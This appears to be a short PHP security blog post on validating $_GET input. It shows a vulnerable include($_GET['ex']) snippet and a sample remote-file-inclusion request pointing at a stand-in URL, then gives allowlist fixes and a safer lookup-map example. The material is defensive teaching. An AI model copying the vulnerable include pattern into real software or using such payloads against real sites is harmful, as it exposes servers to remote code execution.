PHP GET Security
Posted in Security
It is very important to check the data you take from $_GET before you use it.
You can use $_GET in several situations, and each one calls for different measures.
For example, suppose you use something like this:
if (isset($_GET['ex']))
    include($_GET['ex']);
If you use this code, a malicious user can include any page they want in your web page:
?ex=http://www.example.com/bad_page.php
With this request they can pull in any page they choose. To prevent that, accept only values from a list of allowed operations:
$operation = array('add', 'delete', 'edit', 'save');
if (isset($_GET['ex']) && in_array($_GET['ex'], $operation, true)) {
    // ... do something ...
}
You can also use switch or if:
switch ($_GET['ex']) {
    case 'add': // something...
        break;
    case 'delete': // something...
        break;
    default: // something...
}
With if:
if ($_GET['ex'] == "add") {
    // Do something..
}
else if ($_GET['ex'] == "delete") {
    // Do something..
}
else
    die("possible hack attempt");
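The allowlist check applied to the include() case from the start of the post, as an added example (not the original author's code): the request value only selects an entry from a fixed map and never becomes part of the path. The pages/ directory, the file names and the function name resolve_page are assumptions made for illustration.

```php
<?php
// Added example: allowed operation names mapped to fixed files.
// The file names and the pages/ directory are hypothetical.
const PAGES = [
    'add'    => 'add.php',
    'delete' => 'delete.php',
    'edit'   => 'edit.php',
    'save'   => 'save.php',
];

/**
 * Return the file to include for a request, or null when the 'ex'
 * parameter is missing, is not a string, or is not on the allowlist.
 */
function resolve_page(array $query): ?string
{
    $ex = $query['ex'] ?? null;
    // A request such as ?ex[]=add makes PHP deliver an array here,
    // so anything that is not a plain string is rejected first.
    if (!is_string($ex)) {
        return null;
    }
    // The value is used only as a lookup key into the fixed map.
    if (!array_key_exists($ex, PAGES)) {
        return null;
    }
    return __DIR__ . '/pages/' . PAGES[$ex];
}

// Constructed sample requests (stand-ins for $_GET) showing each outcome.
$samples = [
    ['ex' => 'add'],                                  // allowed
    ['ex' => 'http://www.example.com/bad_page.php'],  // the URL from the post
    ['ex' => 'unknown_op'],                           // not on the list
    ['ex' => ['add']],                                // array instead of string
    [],                                               // parameter missing
];
foreach ($samples as $query) {
    $page = resolve_page($query);
    echo json_encode($query, JSON_UNESCAPED_SLASHES),
         ' => ', $page ?? 'rejected', "\n";
}

// In the real page, replace the loop above with:
//   $page = resolve_page($_GET);
//   if ($page === null) { http_response_code(400); exit; }
//   include $page;
```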
